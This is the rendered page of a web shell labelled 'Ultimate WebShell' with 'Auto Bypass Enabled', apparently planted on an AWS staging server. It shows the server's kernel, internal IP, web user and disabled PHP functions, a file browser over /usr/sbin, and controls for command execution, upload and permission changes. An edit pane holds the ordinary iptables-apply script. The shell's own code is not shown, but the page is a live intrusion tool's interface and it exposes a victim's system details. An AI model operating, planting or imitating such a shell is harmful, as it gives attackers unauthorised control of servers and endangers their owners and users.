WebShell Manager
Linux Stag-Enterprise-Staging-20-04 5.11.0-1019-aws #20~20.04.1-Ubuntu SMP Tue Sep 21 10:40:39 UTC 2021 x86_64
Apache
Server: 172.31.9.152
Your IP: 216.73.216.236
System Info
HOME
snap
core22
2411
usr
sbin
Command Execution
Execute
File Upload
Upload
New Folder
New File
Name
Type
Size
Permissions
Modified
Actions
..
Parent
-
drwxr-xr-x
2026-02-25 04:03:09
-
aa-remove-unknown
File
3 KB
0755
2025-08-15 12:17:13
aa-status
File
62.62 KB
0755
2025-08-15 12:17:13
aa-teardown
File
137 B
0755
2022-02-10 00:45:25
add-shell
File
1.03 KB
0755
2022-03-23 13:49:54
addgroup
File
37.35 KB
0755
2021-01-06 06:16:50
adduser
File
37.35 KB
0755
2021-01-06 06:16:50
agetty
File
55.56 KB
0755
2024-04-09 15:32:56
apparmor_parser
File
1.48 MB
0755
2025-08-15 12:17:13
apparmor_status
File
62.62 KB
0755
2025-08-15 12:17:13
arpd
File
26.33 KB
0755
2022-03-24 11:56:47
arptables
File
219.04 KB
0755
2024-01-16 21:14:30
arptables-nft
File
219.04 KB
0755
2024-01-16 21:14:30
arptables-nft-restore
File
219.04 KB
0755
2024-01-16 21:14:30
arptables-nft-save
File
219.04 KB
0755
2024-01-16 21:14:30
arptables-restore
File
219.04 KB
0755
2024-01-16 21:14:30
arptables-save
File
219.04 KB
0755
2024-01-16 21:14:30
badblocks
File
34.32 KB
0755
2023-10-09 01:50:10
blkdeactivate
File
15.97 KB
0755
2024-11-27 19:04:29
blkdiscard
File
22.38 KB
0755
2024-04-09 15:32:56
blkid
File
50.41 KB
0755
2024-04-09 15:32:56
blkzone
File
34.38 KB
0755
2024-04-09 15:32:56
blockdev
File
30.38 KB
0755
2024-04-09 15:32:56
bridge
File
92.49 KB
0755
2022-03-24 11:56:47
capsh
File
30.3 KB
0755
2025-02-20 15:51:02
cfdisk
File
94.73 KB
0755
2024-04-09 15:32:56
chcpu
File
30.38 KB
0755
2024-04-09 15:32:56
chgpasswd
File
58.13 KB
0755
2024-02-06 12:54:23
chmem
File
34.38 KB
0755
2024-04-09 15:32:56
chpasswd
File
54.16 KB
0755
2024-02-06 12:54:23
chroot
File
38.51 KB
0755
2024-02-08 03:46:39
cpgr
File
48.29 KB
0755
2024-02-06 12:54:23
cppw
File
48.29 KB
0755
2024-02-06 12:54:23
cryptdisks_start
File
1.51 KB
0755
2022-01-13 21:44:36
cryptdisks_stop
File
844 B
0755
2022-01-13 21:44:36
cryptsetup
File
169.92 KB
0755
2025-03-07 17:50:37
cryptsetup-reencrypt
File
90.38 KB
0755
2025-03-07 17:50:37
cryptsetup-ssh
File
23.53 KB
0755
2025-03-07 17:50:37
ctrlaltdel
File
14.38 KB
0755
2024-04-09 15:32:56
dcb
File
80.52 KB
0755
2022-03-24 11:56:47
debugfs
File
229.8 KB
0755
2023-10-09 01:50:10
delgroup
File
16.11 KB
0755
2021-01-06 06:16:50
deluser
File
16.11 KB
0755
2021-01-06 06:16:50
depmod
File
170.34 KB
0755
2020-03-12 13:15:28
devlink
File
142.86 KB
0755
2022-03-24 11:56:47
dhclient
File
442.66 KB
0755
2023-01-31 21:54:40
dhclient-script
File
15.92 KB
0755
2023-01-31 21:54:40
dmsetup
File
171.02 KB
0755
2024-11-27 19:04:29
dmstats
File
171.02 KB
0755
2024-11-27 19:04:29
dosfsck
File
82.38 KB
0755
2022-03-23 13:51:01
dosfslabel
File
38.38 KB
0755
2022-03-23 13:51:01
dumpe2fs
File
30.31 KB
0755
2023-10-09 01:50:10
e2freefrag
File
14.3 KB
0755
2023-10-09 01:50:10
e2fsck
File
351.84 KB
0755
2023-10-09 01:50:10
e2image
File
42.31 KB
0755
2023-10-09 01:50:10
e2label
File
102.55 KB
0755
2023-10-09 01:50:10
e2mmpstatus
File
30.31 KB
0755
2023-10-09 01:50:10
e2scrub
File
7.13 KB
0755
2023-10-09 01:50:10
e2scrub_all
File
5.27 KB
0755
2023-10-09 01:50:10
e2undo
File
22.3 KB
0755
2023-10-09 01:50:10
e4crypt
File
30.38 KB
0755
2023-10-09 01:50:10
e4defrag
File
30.3 KB
0755
2023-10-09 01:50:10
ebtables
File
219.04 KB
0755
2024-01-16 21:14:30
ebtables-nft
File
219.04 KB
0755
2024-01-16 21:14:30
ebtables-nft-restore
File
219.04 KB
0755
2024-01-16 21:14:30
ebtables-nft-save
File
219.04 KB
0755
2024-01-16 21:14:30
ebtables-restore
File
219.04 KB
0755
2024-01-16 21:14:30
ebtables-save
File
219.04 KB
0755
2024-01-16 21:14:30
faillock
File
14.15 KB
0755
2025-06-12 14:45:28
fatlabel
File
38.38 KB
0755
2022-03-23 13:51:01
fdisk
File
110.42 KB
0755
2024-04-09 15:32:56
filefrag
File
18.32 KB
0755
2023-10-09 01:50:10
findfs
File
14.38 KB
0755
2024-04-09 15:32:56
fsck
File
42.42 KB
0755
2024-04-09 15:32:56
fsck.cramfs
File
30.44 KB
0755
2024-04-09 15:32:56
fsck.ext2
File
351.84 KB
0755
2023-10-09 01:50:10
fsck.ext3
File
351.84 KB
0755
2023-10-09 01:50:10
fsck.ext4
File
351.84 KB
0755
2023-10-09 01:50:10
fsck.fat
File
82.38 KB
0755
2022-03-23 13:51:01
fsck.minix
File
54.41 KB
0755
2024-04-09 15:32:56
fsck.msdos
File
82.38 KB
0755
2022-03-23 13:51:01
fsck.vfat
File
82.38 KB
0755
2022-03-23 13:51:01
fsfreeze
File
14.38 KB
0755
2024-04-09 15:32:56
fstab-decode
File
18.3 KB
0755
2021-12-14 21:17:22
fstrim
File
42.38 KB
0755
2024-04-09 15:32:56
genl
File
90.44 KB
0755
2022-03-24 11:56:47
getcap
File
14.3 KB
0755
2025-02-20 15:51:02
getpcaps
File
14.3 KB
0755
2025-02-20 15:51:02
getty
File
55.56 KB
0755
2024-04-09 15:32:56
groupadd
File
66.91 KB
0755
2024-02-06 12:54:23
groupdel
File
62.73 KB
0755
2024-02-06 12:54:23
groupmems
File
54.19 KB
0755
2024-02-06 12:54:23
groupmod
File
66.82 KB
0755
2024-02-06 12:54:23
grpck
File
58.13 KB
0755
2024-02-06 12:54:23
grpconv
File
50.01 KB
0755
2024-02-06 12:54:23
grpunconv
File
50.01 KB
0755
2024-02-06 12:54:23
halt
File
973.23 KB
0755
2023-03-02 12:58:02
hwclock
File
50.5 KB
0755
2024-04-09 15:32:56
iconvconfig
File
30.4 KB
0755
2026-01-30 08:20:56
init
File
1.55 MB
0755
2023-03-02 12:58:02
insmod
File
170.34 KB
0755
2020-03-12 13:15:28
installkernel
File
2.6 KB
0755
2022-03-23 13:49:54
integritysetup
File
54.07 KB
0755
2025-03-07 17:50:37
invoke-rc.d
File
16.12 KB
0755
2021-12-07 21:55:54
ip
File
597.62 KB
0755
2020-02-13 17:21:59
ip6tables
File
219.04 KB
0755
2024-01-16 21:14:30
ip6tables-apply
File
6.89 KB
0755
2021-01-15 22:03:39
ip6tables-legacy
File
96.95 KB
0755
2024-01-16 21:14:30
ip6tables-legacy-restore
File
96.95 KB
0755
2024-01-16 21:14:30
ip6tables-legacy-save
File
96.95 KB
0755
2024-01-16 21:14:30
ip6tables-nft
File
219.04 KB
0755
2024-01-16 21:14:30
ip6tables-nft-restore
File
219.04 KB
0755
2024-01-16 21:14:30
ip6tables-nft-save
File
219.04 KB
0755
2024-01-16 21:14:30
ip6tables-restore
File
219.04 KB
0755
2024-01-16 21:14:30
ip6tables-restore-translate
File
219.04 KB
0755
2024-01-16 21:14:30
ip6tables-save
File
219.04 KB
0755
2024-01-16 21:14:30
ip6tables-translate
File
219.04 KB
0755
2024-01-16 21:14:30
iptables
File
219.04 KB
0755
2024-01-16 21:14:30
iptables-apply
File
6.89 KB
0755
2021-01-15 22:03:39
iptables-legacy
File
96.95 KB
0755
2024-01-16 21:14:30
iptables-legacy-restore
File
96.95 KB
0755
2024-01-16 21:14:30
iptables-legacy-save
File
96.95 KB
0755
2024-01-16 21:14:30
iptables-nft
File
219.04 KB
0755
2024-01-16 21:14:30
iptables-nft-restore
File
219.04 KB
0755
2024-01-16 21:14:30
iptables-nft-save
File
219.04 KB
0755
2024-01-16 21:14:30
iptables-restore
File
219.04 KB
0755
2024-01-16 21:14:30
iptables-restore-translate
File
219.04 KB
0755
2024-01-16 21:14:30
iptables-save
File
219.04 KB
0755
2024-01-16 21:14:30
iptables-translate
File
219.04 KB
0755
2024-01-16 21:14:30
isosize
File
14.38 KB
0755
2024-04-09 15:32:56
killall5
File
30.38 KB
0755
2021-12-14 21:17:22
ldattach
File
26.38 KB
0755
2024-04-09 15:32:56
ldconfig
File
387 B
0755
2026-01-30 08:20:56
ldconfig.real
File
1.16 MB
0755
2026-01-30 08:20:56
logsave
File
14.16 KB
0755
2023-10-09 01:50:10
losetup
File
70.52 KB
0755
2024-04-09 15:32:56
lsmod
File
170.34 KB
0755
2020-03-12 13:15:28
luksformat
File
3.32 KB
0755
2022-01-13 21:44:36
mkdosfs
File
50.83 KB
0755
2022-03-23 13:51:01
mke2fs
File
130.62 KB
0755
2023-10-09 01:50:10
mkfs
File
14.38 KB
0755
2024-04-09 15:32:56
mkfs.bfs
File
22.38 KB
0755
2024-04-09 15:32:56
mkfs.cramfs
File
34.32 KB
0755
2024-04-09 15:32:56
mkfs.ext2
File
130.62 KB
0755
2023-10-09 01:50:10
mkfs.ext3
File
130.62 KB
0755
2023-10-09 01:50:10
mkfs.ext4
File
130.62 KB
0755
2023-10-09 01:50:10
mkfs.fat
File
50.83 KB
0755
2022-03-23 13:51:01
mkfs.minix
File
42.39 KB
0755
2024-04-09 15:32:56
mkfs.msdos
File
50.83 KB
0755
2022-03-23 13:51:01
mkfs.vfat
File
50.83 KB
0755
2022-03-23 13:51:01
mkhomedir_helper
File
22.17 KB
0755
2025-06-12 14:45:28
mklost+found
File
14.3 KB
0755
2023-10-09 01:50:10
mkswap
File
46.38 KB
0755
2024-04-09 15:32:56
modinfo
File
170.34 KB
0755
2020-03-12 13:15:28
modprobe
File
170.34 KB
0755
2020-03-12 13:15:28
netplan
File
798 B
0755
2023-05-17 17:11:16
newusers
File
74.73 KB
0755
2024-02-06 12:54:23
nfnl_osf
File
18.3 KB
0755
2024-01-16 21:14:30
nologin
File
14.3 KB
0755
2024-02-06 12:54:23
pam-auth-update
File
20.5 KB
0755
2024-11-17 10:17:22
pam_extrausers_chkpwd
File
22.15 KB
2755
2025-06-12 14:45:28
pam_extrausers_update
File
30.15 KB
0755
2025-06-12 14:45:28
pam_getenv
File
2.82 KB
0755
2024-11-17 10:17:22
pam_timestamp_check
File
14.15 KB
0755
2025-06-12 14:45:28
pivot_root
File
14.38 KB
0755
2024-04-09 15:32:56
plymouthd
File
150.55 KB
0755
2023-01-03 09:56:53
poweroff
File
973.23 KB
0755
2023-03-02 12:58:02
pwck
File
50.13 KB
0755
2024-02-06 12:54:23
pwconv
File
46.01 KB
0755
2024-02-06 12:54:23
pwunconv
File
42.01 KB
0755
2024-02-06 12:54:23
readprofile
File
22.41 KB
0755
2024-04-09 15:32:56
reboot
File
973.23 KB
0755
2023-03-02 12:58:02
remove-shell
File
1.07 KB
0755
2022-03-23 13:49:54
resize2fs
File
66.3 KB
0755
2023-10-09 01:50:10
rfkill
File
30.23 KB
0755
2024-04-09 15:32:56
rmmod
File
170.34 KB
0755
2020-03-12 13:15:28
rmt
File
58.57 KB
0755
2023-12-05 05:15:51
rmt-tar
File
58.57 KB
0755
2023-12-05 05:15:51
rtacct
File
28.31 KB
0755
2022-03-24 11:56:47
rtcwake
File
34.38 KB
0755
2024-04-09 15:32:56
rtmon
File
90.39 KB
0755
2022-03-24 11:56:47
runlevel
File
973.23 KB
0755
2023-03-02 12:58:02
runuser
File
54.38 KB
0755
2024-04-09 15:32:56
service
File
8.88 KB
0755
2022-02-15 22:32:46
setcap
File
14.3 KB
0755
2025-02-20 15:51:02
sfdisk
File
102.38 KB
0755
2024-04-09 15:32:56
shadowconfig
File
885 B
0755
2021-11-11 15:42:38
shutdown
File
973.23 KB
0755
2023-03-02 12:58:02
sshd
File
899.7 KB
0755
2025-04-11 12:05:47
start-stop-daemon
File
47.35 KB
0755
2025-09-09 20:09:16
sudo_logsrvd
File
200.1 KB
0755
2025-06-25 12:48:23
sudo_sendlog
File
107.34 KB
0755
2025-06-25 12:48:23
sulogin
File
42.38 KB
0755
2024-04-09 15:32:56
swaplabel
File
18.38 KB
0755
2024-04-09 15:32:56
swapoff
File
22.38 KB
0755
2024-04-09 15:32:56
swapon
File
42.38 KB
0755
2024-04-09 15:32:56
switch_root
File
22.38 KB
0755
2024-04-09 15:32:56
sysctl
File
30.23 KB
0755
2023-10-31 11:36:04
tarcat
File
936 B
0755
2023-12-05 05:15:51
tc
File
614.08 KB
0755
2022-03-24 11:56:47
telinit
File
973.23 KB
0755
2023-03-02 12:58:02
tipc
File
90.44 KB
0755
2022-03-24 11:56:47
tune2fs
File
102.55 KB
0755
2023-10-09 01:50:10
tzconfig
File
106 B
0755
2025-04-22 10:15:47
unix_chkpwd
File
26.15 KB
2755
2025-06-12 14:45:28
unix_update
File
30.15 KB
0755
2025-06-12 14:45:28
update-ca-certificates
File
5.29 KB
0755
2024-09-24 17:46:09
update-passwd
File
34.56 KB
0755
2022-03-23 09:42:40
update-rc.d
File
16.92 KB
0755
2021-12-07 21:55:54
update-shells
File
3.72 KB
0755
2022-03-23 13:49:54
useradd
File
127.66 KB
0755
2024-02-06 12:54:23
userdel
File
86.85 KB
0755
2024-02-06 12:54:23
usermod
File
123.46 KB
0755
2024-02-06 12:54:23
vdpa
File
30.56 KB
0755
2022-03-24 11:56:47
veritysetup
File
43.76 KB
0755
2025-03-07 17:50:37
vigr
File
56.53 KB
0755
2024-02-06 12:54:23
vipw
File
56.53 KB
0755
2024-02-06 12:54:23
visudo
File
219.79 KB
0755
2025-06-25 12:48:23
wipefs
File
38.38 KB
0755
2024-04-09 15:32:56
wpa_action
File
1.69 KB
0755
2025-07-21 23:13:31
wpa_cli
File
140.31 KB
0755
2025-07-21 23:13:31
wpa_supplicant
File
3.24 MB
0755
2025-07-21 23:13:31
xtables-legacy-multi
File
96.95 KB
0755
2024-01-16 21:14:30
xtables-monitor
File
219.04 KB
0755
2024-01-16 21:14:30
xtables-nft-multi
File
219.04 KB
0755
2024-01-16 21:14:30
zic
File
62.32 KB
0755
2026-01-30 08:20:56
zramctl
File
54.52 KB
0755
2024-04-09 15:32:56
0
items selected
Choose Action...
Delete Selected
Zip Selected
Unzip Selected
Execute Action
Clear Selection
© Ultimate WebShell | Auto Bypass Enabled
Create New Folder
Create New File
Edit File: iptables-apply
#!/bin/bash # iptables-apply -- a safer way to update iptables remotely # # Usage: # iptables-apply [-hV] [-t timeout] [-w savefile] {[rulesfile]|-c [runcmd]} # # Versions: # * 1.0 Copyright 2006 Martin F. Krafft <madduck@madduck.net> # Original version # * 1.1 Copyright 2010 GW <gw.2010@tnode.com or http://gw.tnode.com/> # Added parameter -c (run command) # Added parameter -w (save successfully applied rules to file) # Major code cleanup # # Released under the terms of the Artistic Licence 2.0 # set -eu PROGNAME="${0##*/}" VERSION=1.1 ### Default settings DEF_TIMEOUT=10 MODE=0 # apply rulesfile mode # MODE=1 # run command mode case "$PROGNAME" in (*6*) SAVE=ip6tables-save RESTORE=ip6tables-restore DEF_RULESFILE="/etc/network/ip6tables.up.rules" DEF_SAVEFILE="$DEF_RULESFILE" DEF_RUNCMD="/etc/network/ip6tables.up.run" ;; (*) SAVE=iptables-save RESTORE=iptables-restore DEF_RULESFILE="/etc/network/iptables.up.rules" DEF_SAVEFILE="$DEF_RULESFILE" DEF_RUNCMD="/etc/network/iptables.up.run" ;; esac ### Functions function blurb() { cat <<-__EOF__ $PROGNAME $VERSION -- a safer way to update iptables remotely __EOF__ } function copyright() { cat <<-__EOF__ $PROGNAME has been published under the terms of the Artistic Licence 2.0. Original version - Copyright 2006 Martin F. Krafft <madduck@madduck.net>. Version 1.1 - Copyright 2010 GW <gw.2010@tnode.com or http://gw.tnode.com/>. __EOF__ } function about() { blurb echo copyright } function usage() { blurb echo cat <<-__EOF__ Usage: $PROGNAME [-hV] [-t timeout] [-w savefile] {[rulesfile]|-c [runcmd]} The script will try to apply a new rulesfile (as output by iptables-save, read by iptables-restore) or run a command to configure iptables and then prompt the user whether the changes are okay. If the new iptables rules cut the existing connection, the user will not be able to answer affirmatively. In this case, the script rolls back to the previous working iptables rules after the timeout expires. Successfully applied rules can also be written to savefile and later used to roll back to this state. This can be used to implement a store last good configuration mechanism when experimenting with an iptables setup script: $PROGNAME -w $DEF_SAVEFILE -c $DEF_RUNCMD When called as ip6tables-apply, the script will use ip6tables-save/-restore and IPv6 default values instead. Default value for rulesfile is '$DEF_RULESFILE'. Options: -t seconds, --timeout seconds Specify the timeout in seconds (default: $DEF_TIMEOUT). -w savefile, --write savefile Specify the savefile where successfully applied rules will be written to (default if empty string is given: $DEF_SAVEFILE). -c runcmd, --command runcmd Run command runcmd to configure iptables instead of applying a rulesfile (default: $DEF_RUNCMD). -h, --help Display this help text. -V, --version Display version information. __EOF__ } function checkcommands() { for cmd in "${COMMANDS[@]}"; do if ! command -v "$cmd" >/dev/null; then echo "Error: needed command not found: $cmd" >&2 exit 127 fi done } function revertrules() { echo -n "Reverting to old iptables rules... " "$RESTORE" <"$TMPFILE" echo "done." } ### Parsing and checking parameters TIMEOUT="$DEF_TIMEOUT" SAVEFILE="" SHORTOPTS="t:w:chV"; LONGOPTS="timeout:,write:,command,help,version"; OPTS=$(getopt -s bash -o "$SHORTOPTS" -l "$LONGOPTS" -n "$PROGNAME" -- "$@") || exit $? for opt in $OPTS; do case "$opt" in (-*) unset OPT_STATE ;; (*) case "${OPT_STATE:-}" in (SET_TIMEOUT) eval TIMEOUT=$opt;; (SET_SAVEFILE) eval SAVEFILE=$opt [ -z "$SAVEFILE" ] && SAVEFILE="$DEF_SAVEFILE" ;; esac ;; esac case "$opt" in (-t|--timeout) OPT_STATE="SET_TIMEOUT";; (-w|--write) OPT_STATE="SET_SAVEFILE";; (-c|--command) MODE=1;; (-h|--help) usage >&2; exit 0;; (-V|--version) about >&2; exit 0;; (--) break;; esac shift done # Validate parameters if [ "$TIMEOUT" -ge 0 ] 2>/dev/null; then TIMEOUT=$(($TIMEOUT)) else echo "Error: timeout must be a positive number" >&2 exit 1 fi if [ -n "$SAVEFILE" -a -e "$SAVEFILE" -a ! -w "$SAVEFILE" ]; then echo "Error: savefile not writable: $SAVEFILE" >&2 exit 8 fi case "$MODE" in (1) # Treat parameter as runcmd (run command mode) RUNCMD="${1:-$DEF_RUNCMD}" if [ ! -x "$RUNCMD" ]; then echo "Error: runcmd not executable: $RUNCMD" >&2 exit 6 fi # Needed commands COMMANDS=(mktemp "$SAVE" "$RESTORE" "$RUNCMD") checkcommands ;; (*) # Treat parameter as rulesfile (apply rulesfile mode) RULESFILE="${1:-$DEF_RULESFILE}"; if [ ! -r "$RULESFILE" ]; then echo "Error: rulesfile not readable: $RULESFILE" >&2 exit 2 fi # Needed commands COMMANDS=(mktemp "$SAVE" "$RESTORE") checkcommands ;; esac ### Begin work # Store old iptables rules to temporary file TMPFILE=`mktemp /tmp/$PROGNAME-XXXXXXXX` trap "rm -f $TMPFILE" EXIT HUP INT QUIT ILL TRAP ABRT BUS \ FPE USR1 SEGV USR2 PIPE ALRM TERM if ! "$SAVE" >"$TMPFILE"; then # An error occured if ! grep -q ipt /proc/modules 2>/dev/null; then echo "Error: iptables support lacking from the kernel" >&2 exit 3 else echo "Error: unknown error saving old iptables rules: $TMPFILE" >&2 exit 4 fi fi # Legacy to stop the fail2ban daemon if present [ -x /etc/init.d/fail2ban ] && /etc/init.d/fail2ban stop # Configure iptables case "$MODE" in (1) # Run command in background and kill it if it times out echo -n "Running command '$RUNCMD'... " "$RUNCMD" & CMD_PID=$! ( sleep "$TIMEOUT"; kill "$CMD_PID" 2>/dev/null; exit 0 ) & CMDTIMEOUT_PID=$! if ! wait "$CMD_PID"; then echo "failed." echo "Error: unknown error running command: $RUNCMD" >&2 revertrules exit 7 else echo "done." fi ;; (*) # Apply iptables rulesfile echo -n "Applying new iptables rules from '$RULESFILE'... " if ! "$RESTORE" <"$RULESFILE"; then echo "failed." echo "Error: unknown error applying new iptables rules: $RULESFILE" >&2 revertrules exit 5 else echo "done." fi ;; esac # Prompt user for confirmation echo -n "Can you establish NEW connections to the machine? (y/N) " read -n1 -t "$TIMEOUT" ret 2>&1 || : case "${ret:-}" in (y*|Y*) # Success echo if [ ! -z "$SAVEFILE" ]; then # Write successfully applied rules to the savefile echo "Writing successfully applied rules to '$SAVEFILE'..." if ! "$SAVE" >"$SAVEFILE"; then echo "Error: unknown error writing successfully applied rules: $SAVEFILE" >&2 exit 9 fi fi echo "... then my job is done. See you next time." ;; (*) # Failed echo if [ -z "${ret:-}" ]; then echo "Timeout! Something happened (or did not). Better play it safe..." else echo "No affirmative response! Better play it safe..." fi revertrules exit 255 ;; esac # Legacy to start the fail2ban daemon again [ -x /etc/init.d/fail2ban ] && /etc/init.d/fail2ban start exit 0 # vim:noet:sw=8
Rename
Change Permissions
Common permissions: 755 (rwxr-xr-x), 644 (rw-r--r--), 777 (rwxrwxrwx)
System Information
Uname: Linux Stag-Enterprise-Staging-20-04 5.11.0-1019-aws #20~20.04.1-Ubuntu SMP Tue Sep 21 10:40:39 UTC 2021 x86_64 Software: Apache PHP Version: 7.4.3-4ubuntu2.29 Protocol: HTTP/1.1 Server IP: 172.31.9.152 Your IP: 216.73.216.236 Mail: ON Curl: ON Owner: www-data MySQL: ON Disabled Functions: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, Auto Bypass: ENABLED